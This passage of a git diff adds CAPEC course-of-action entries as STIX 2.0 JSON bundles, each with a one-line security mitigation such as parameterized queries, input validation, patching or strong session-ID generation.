"description": "It is important to protect WSDL file or provide limited access to it.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--19636648-c6d0-40d4-abe6-b290bc6df849.json b/capec/course-of-action/course-of-action--19636648-c6d0-40d4-abe6-b290bc6df849.json new file mode 100644 index 0000000000..96d4f20fd6 --- /dev/null +++ b/capec/course-of-action/course-of-action--19636648-c6d0-40d4-abe6-b290bc6df849.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8545397d-d11d-4fd6-b452-951df70a7b9d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--19636648-c6d0-40d4-abe6-b290bc6df849", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-69-8", + "description": "Monitor traffic and resource usage and pay attention if resource exhaustion occurs.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1a089e2b-9422-439a-a57b-3cdbc11a2056.json b/capec/course-of-action/course-of-action--1a089e2b-9422-439a-a57b-3cdbc11a2056.json new file mode 100644 index 0000000000..d6fe7770f5 --- /dev/null +++ b/capec/course-of-action/course-of-action--1a089e2b-9422-439a-a57b-3cdbc11a2056.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--85c5c4a4-4e93-4808-b280-155e9ea31c8e", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1a089e2b-9422-439a-a57b-3cdbc11a2056", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-510-0", + "description": "To limit one's exposure to this type of attack, tunnel communications through a secure proxy service.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1a1c1ba7-1335-44e4-a14e-2fc2428dc2d3.json b/capec/course-of-action/course-of-action--1a1c1ba7-1335-44e4-a14e-2fc2428dc2d3.json new file mode 100644 index 0000000000..ec413b4bc0 --- /dev/null +++ b/capec/course-of-action/course-of-action--1a1c1ba7-1335-44e4-a14e-2fc2428dc2d3.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--245df613-42bc-4d15-ba68-d410051ed288", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1a1c1ba7-1335-44e4-a14e-2fc2428dc2d3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-641-3", + "description": "Use of sxstrace.exe on Windows as well as manual inspection of the manifests.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1a69aad1-921e-4766-9425-f61387d1dda1.json b/capec/course-of-action/course-of-action--1a69aad1-921e-4766-9425-f61387d1dda1.json new file mode 100644 index 0000000000..fd1c801e41 --- /dev/null +++ b/capec/course-of-action/course-of-action--1a69aad1-921e-4766-9425-f61387d1dda1.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c6fef821-58f3-4adf-9f43-0aab88e7a57a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1a69aad1-921e-4766-9425-f61387d1dda1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-198-0", + "description": "Design: Use libraries and templates that minimize unfiltered input.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1aec628a-36f6-4e86-a54a-24586daa551a.json b/capec/course-of-action/course-of-action--1aec628a-36f6-4e86-a54a-24586daa551a.json new file mode 100644 index 0000000000..43e6cdb5ee --- /dev/null +++ b/capec/course-of-action/course-of-action--1aec628a-36f6-4e86-a54a-24586daa551a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3b6a8b4b-c30b-4e0b-8fae-f59ed3ad26ab", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1aec628a-36f6-4e86-a54a-24586daa551a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-505-0", + "description": "The only known mitigation to this attack is to avoid installing the malicious application on the device. Applications usually have to declare the schemes they wish to register, so detecting this during a review is feasible.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1b4612ba-6943-4cdf-98b9-b917db8790f7.json b/capec/course-of-action/course-of-action--1b4612ba-6943-4cdf-98b9-b917db8790f7.json new file mode 100644 index 0000000000..202d16ba41 --- /dev/null +++ b/capec/course-of-action/course-of-action--1b4612ba-6943-4cdf-98b9-b917db8790f7.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--cbaaacaa-4d7a-4147-bfc2-12e845524e79", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1b4612ba-6943-4cdf-98b9-b917db8790f7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-109-0", + "description": "Remember to understand how to use the data access methods generated by the ORM tool / framework properly in a way that would leverage the built-in security mechanisms of the framework", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1bb015ae-0c88-440b-bfa0-db24d236d012.json b/capec/course-of-action/course-of-action--1bb015ae-0c88-440b-bfa0-db24d236d012.json new file mode 100644 index 0000000000..44dcaf8735 --- /dev/null +++ b/capec/course-of-action/course-of-action--1bb015ae-0c88-440b-bfa0-db24d236d012.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3158a95e-5a8a-4116-b581-e6a4c4a2150a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1bb015ae-0c88-440b-bfa0-db24d236d012", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-110-0", + "description": "Properly validate and sanitize/reject user input at the service provider.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1d71ce40-c669-47a9-b734-e8a4457d41b7.json b/capec/course-of-action/course-of-action--1d71ce40-c669-47a9-b734-e8a4457d41b7.json new file mode 100644 index 0000000000..33e4c11d8f --- /dev/null +++ b/capec/course-of-action/course-of-action--1d71ce40-c669-47a9-b734-e8a4457d41b7.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d0329b8f-ce2a-4c45-bdfa-6f708a867130", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1d71ce40-c669-47a9-b734-e8a4457d41b7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-59-0", + "description": "Use a strong source of randomness to generate a session ID.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1da47c6c-e10f-4276-bbe6-582f7fc465ab.json b/capec/course-of-action/course-of-action--1da47c6c-e10f-4276-bbe6-582f7fc465ab.json new file mode 100644 index 0000000000..1419ea08be --- /dev/null +++ b/capec/course-of-action/course-of-action--1da47c6c-e10f-4276-bbe6-582f7fc465ab.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c3516752-0d88-41bb-8f10-3944ce7b389f", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1da47c6c-e10f-4276-bbe6-582f7fc465ab", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-549-3", + "description": "Execute all suspicious files in a sandbox environment.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1da8555a-673e-49d9-a3a6-fa1404b9d1a9.json b/capec/course-of-action/course-of-action--1da8555a-673e-49d9-a3a6-fa1404b9d1a9.json new file mode 100644 index 0000000000..8210cbb3a4 --- /dev/null +++ b/capec/course-of-action/course-of-action--1da8555a-673e-49d9-a3a6-fa1404b9d1a9.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4a153290-b68c-4670-be11-8bc1d36bc254", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1da8555a-673e-49d9-a3a6-fa1404b9d1a9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-126-11", + "description": "Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification -- whitelisting approach.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1dd51708-9b86-403a-8e0c-183605f1d327.json b/capec/course-of-action/course-of-action--1dd51708-9b86-403a-8e0c-183605f1d327.json new file mode 100644 index 0000000000..f074010cbf --- /dev/null +++ b/capec/course-of-action/course-of-action--1dd51708-9b86-403a-8e0c-183605f1d327.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ee26ce37-6fa7-4287-99ba-9870893d350c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1dd51708-9b86-403a-8e0c-183605f1d327", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-105-0", + "description": "Make sure to install the latest vendor security patches available for the web server.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1e30abe4-e169-4463-9f57-4d9a61918f7a.json b/capec/course-of-action/course-of-action--1e30abe4-e169-4463-9f57-4d9a61918f7a.json new file mode 100644 index 0000000000..3336a2f081 --- /dev/null +++ b/capec/course-of-action/course-of-action--1e30abe4-e169-4463-9f57-4d9a61918f7a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--94102593-1a27-4f43-9af4-29409e7cf447", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1e30abe4-e169-4463-9f57-4d9a61918f7a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-489-0", + "description": "To mitigate this type of an attack, an organization can create rule based filters to silently drop connections if too many are attempted in a certain time period.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1e44c94e-9c2c-4855-b235-6abd990a40b4.json b/capec/course-of-action/course-of-action--1e44c94e-9c2c-4855-b235-6abd990a40b4.json new file mode 100644 index 0000000000..ff47ef27be --- /dev/null +++ b/capec/course-of-action/course-of-action--1e44c94e-9c2c-4855-b235-6abd990a40b4.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--a3199170-97f2-410f-825d-b378143e5c3c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1e44c94e-9c2c-4855-b235-6abd990a40b4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-240-2", + "description": "Enforce regular patching of software.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1e9eba5c-8854-484c-9658-e9a241568533.json b/capec/course-of-action/course-of-action--1e9eba5c-8854-484c-9658-e9a241568533.json new file mode 100644 index 0000000000..910bc1cfb0 --- /dev/null +++ b/capec/course-of-action/course-of-action--1e9eba5c-8854-484c-9658-e9a241568533.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3796630f-7e0c-49d7-a9bc-468cfcdf7c9b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1e9eba5c-8854-484c-9658-e9a241568533", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-66-1", + "description": "Use of parameterized queries or stored procedures - Parameterization causes the input to be restricted to certain domains, such as strings or integers, and any input outside such domains is considered invalid and the query fails. Note that SQL Injection is possible even in the presence of stored procedures if the eventual query is constructed dynamically.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1eac470d-04ba-449c-b2d8-34fa512d4356.json b/capec/course-of-action/course-of-action--1eac470d-04ba-449c-b2d8-34fa512d4356.json new file mode 100644 index 0000000000..9a3c9abf90 --- /dev/null +++ b/capec/course-of-action/course-of-action--1eac470d-04ba-449c-b2d8-34fa512d4356.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--fc7649fc-6dd7-4577-ae8f-ce467469c0f9", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1eac470d-04ba-449c-b2d8-34fa512d4356", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-487-0", + "description": "To mitigate this type of an attack, an organization can enable ingress filtering. Additionally modifications to BGP like black hole routing and sinkhole routing(RFC3882) help mitigate the spoofed source IP nature of these attacks.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1f80519c-ae05-4092-9e9c-2fe2fc16071f.json b/capec/course-of-action/course-of-action--1f80519c-ae05-4092-9e9c-2fe2fc16071f.json new file mode 100644 index 0000000000..0fc5b967ec --- /dev/null +++ b/capec/course-of-action/course-of-action--1f80519c-ae05-4092-9e9c-2fe2fc16071f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3857c880-cbeb-489a-b80f-b967095acf0c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1f80519c-ae05-4092-9e9c-2fe2fc16071f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "name": "coa-58-1", + "description": "Implementation: Ensure that HTTP Get methods only retrieve state and do not alter state on the server side", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1f9c29dd-86fa-4511-877e-bf893797eb91.json b/capec/course-of-action/course-of-action--1f9c29dd-86fa-4511-877e-bf893797eb91.json new file mode 100644 index 0000000000..b45aff6dc3 --- /dev/null +++ b/capec/course-of-action/course-of-action--1f9c29dd-86fa-4511-877e-bf893797eb91.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--df3c4d70-ec03-4b21-beb2-8c31fa276ffa", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1f9c29dd-86fa-4511-877e-bf893797eb91", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-476-0", + "description": "Ensure the application is using parsing and data display techniques that will accurately display control characters, international symbols and markings, and ultimately recognize potential homograph attacks.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1fad77cc-fcbb-4256-9333-999394016ef9.json b/capec/course-of-action/course-of-action--1fad77cc-fcbb-4256-9333-999394016ef9.json new file mode 100644 index 0000000000..5cdf13e5a2 --- /dev/null +++ b/capec/course-of-action/course-of-action--1fad77cc-fcbb-4256-9333-999394016ef9.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7dedd59f-cb83-49a0-9dc1-e638f2d505b2", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1fad77cc-fcbb-4256-9333-999394016ef9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-132-0", + "description": "Design: Check for the existence of files to be created, if in existence verify they are neither symlinks nor hard links before opening them.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1fb6f288-179f-4b15-8414-32b5d480c21a.json b/capec/course-of-action/course-of-action--1fb6f288-179f-4b15-8414-32b5d480c21a.json new file mode 100644 index 0000000000..c8a73386cb --- /dev/null +++ b/capec/course-of-action/course-of-action--1fb6f288-179f-4b15-8414-32b5d480c21a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--eb20e6c9-2df1-4025-8f5d-79cb8551dbd8", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1fb6f288-179f-4b15-8414-32b5d480c21a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-130-3", + "description": "Use resource-limiting settings, if possible.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--202f7849-cf4c-4f0e-91c9-edc6cb29b266.json b/capec/course-of-action/course-of-action--202f7849-cf4c-4f0e-91c9-edc6cb29b266.json new file mode 100644 index 0000000000..ee1fdf161a --- /dev/null +++ b/capec/course-of-action/course-of-action--202f7849-cf4c-4f0e-91c9-edc6cb29b266.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--fac568b7-4a56-48ce-89a0-244421d97d0c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--202f7849-cf4c-4f0e-91c9-edc6cb29b266", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-182-2", + "description": "Implementation: remove debug information.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--208d3eef-ea1f-4ab5-bef3-7691c4b0ffac.json b/capec/course-of-action/course-of-action--208d3eef-ea1f-4ab5-bef3-7691c4b0ffac.json new file mode 100644 index 0000000000..e8cf622676 --- /dev/null +++ b/capec/course-of-action/course-of-action--208d3eef-ea1f-4ab5-bef3-7691c4b0ffac.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--11925ef3-0ef9-40ae-af59-f5c032ebaa6c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--208d3eef-ea1f-4ab5-bef3-7691c4b0ffac", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-182-3", + "description": "Implementation: use SSL when loading external data", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--20c7d57f-ca94-4776-ba01-377f4e5bf7bb.json b/capec/course-of-action/course-of-action--20c7d57f-ca94-4776-ba01-377f4e5bf7bb.json new file mode 100644 index 0000000000..afcf5ba417 --- /dev/null +++ b/capec/course-of-action/course-of-action--20c7d57f-ca94-4776-ba01-377f4e5bf7bb.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--2e78cace-fa4c-4807-a47e-77908dda124a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--20c7d57f-ca94-4776-ba01-377f4e5bf7bb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-59-4", + "description": "Encrypt the session ID if you expose it to the user. For instance session ID can be stored in a cookie in encrypted format.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--20eef050-3b31-4e1b-a34a-d43c0f6f3870.json b/capec/course-of-action/course-of-action--20eef050-3b31-4e1b-a34a-d43c0f6f3870.json new file mode 100644 index 0000000000..0062e62582 --- /dev/null +++ b/capec/course-of-action/course-of-action--20eef050-3b31-4e1b-a34a-d43c0f6f3870.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--dc8b11f0-6fb7-44b6-b6a9-32635603391f", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--20eef050-3b31-4e1b-a34a-d43c0f6f3870", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-168-2", + "description": "Implementation: Use products that are Alternate Data Stream aware for virus scanning and system security operations.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--2169ecc1-a465-4c48-a073-853c776f16ee.json b/capec/course-of-action/course-of-action--2169ecc1-a465-4c48-a073-853c776f16ee.json new file mode 100644 index 0000000000..ca367ac523 --- /dev/null +++ b/capec/course-of-action/course-of-action--2169ecc1-a465-4c48-a073-853c776f16ee.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d1b5accb-c362-48d1-a3dd-16ec5318c49b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--2169ecc1-a465-4c48-a073-853c776f16ee", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-69-4", + "description": "Avoid revealing information about your system (e.g., version of the program) to anonymous users.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--21ed7193-3366-410a-8a54-f78088f80cca.json b/capec/course-of-action/course-of-action--21ed7193-3366-410a-8a54-f78088f80cca.json new file mode 100644 index 0000000000..f5f3056c0b --- /dev/null +++ b/capec/course-of-action/course-of-action--21ed7193-3366-410a-8a54-f78088f80cca.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--1ac02f8b-df0b-4d7a-a5fb-f9fdc38e854d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--21ed7193-3366-410a-8a54-f78088f80cca", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-71-0", + "description": "Ensure that the system is Unicode aware and can properly process Unicode data. Do not make an assumption that data will be in ASCII.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--2248876f-47b7-4818-9150-38be47817f40.json b/capec/course-of-action/course-of-action--2248876f-47b7-4818-9150-38be47817f40.json new file mode 100644 index 0000000000..3d72ddedbd --- /dev/null +++ b/capec/course-of-action/course-of-action--2248876f-47b7-4818-9150-38be47817f40.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--5be55e50-e142-4f02-be2c-bc29c796a6fc", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--2248876f-47b7-4818-9150-38be47817f40", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-126-10", + "description": "Implementation: Use possible permissions on file access when developing and deploying web applications.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--22d9d0ed-1d6b-4e93-8f8f-faa6b4d6ef6e.json b/capec/course-of-action/course-of-action--22d9d0ed-1d6b-4e93-8f8f-faa6b4d6ef6e.json new file mode 100644 index 0000000000..00a66f7071 --- /dev/null +++ b/capec/course-of-action/course-of-action--22d9d0ed-1d6b-4e93-8f8f-faa6b4d6ef6e.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7bf8755e-c17a-4572-af68-9fa04559917f", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--22d9d0ed-1d6b-4e93-8f8f-faa6b4d6ef6e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-42-3", + "description": "Use mail.local", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--2323dd67-cf08-4f18-9615-624b3b78eb08.json b/capec/course-of-action/course-of-action--2323dd67-cf08-4f18-9615-624b3b78eb08.json new file mode 100644 index 0000000000..2d4a90b38c --- /dev/null +++ b/capec/course-of-action/course-of-action--2323dd67-cf08-4f18-9615-624b3b78eb08.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--2b261c96-7756-4a6a-897d-d139f1d6c797", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--2323dd67-cf08-4f18-9615-624b3b78eb08", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-19-1", + "description": "Utilize strict type, character, and encoding enforcement.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--234cea73-49f4-4e3c-acc9-1960335386d9.json b/capec/course-of-action/course-of-action--234cea73-49f4-4e3c-acc9-1960335386d9.json new file mode 100644 index 0000000000..788a2616b5 --- /dev/null +++ b/capec/course-of-action/course-of-action--234cea73-49f4-4e3c-acc9-1960335386d9.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--9857d053-492f-4597-8b9c-f5f20b3873af", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--234cea73-49f4-4e3c-acc9-1960335386d9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-6-0", + "description": "Design: Do not program input values directly on command shell, instead treat user input as guilty until proven innocent. Build a function that takes user input and converts it to applications specific types and values, stripping or filtering out all unauthorized commands and characters in the process.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--239b3766-bea2-4e5f-9e51-42ff425ebf16.json b/capec/course-of-action/course-of-action--239b3766-bea2-4e5f-9e51-42ff425ebf16.json new file mode 100644 index 0000000000..65d6d9cce6 --- /dev/null +++ b/capec/course-of-action/course-of-action--239b3766-bea2-4e5f-9e51-42ff425ebf16.json @@ -0,0 +1,19 @@ +{ + "type": 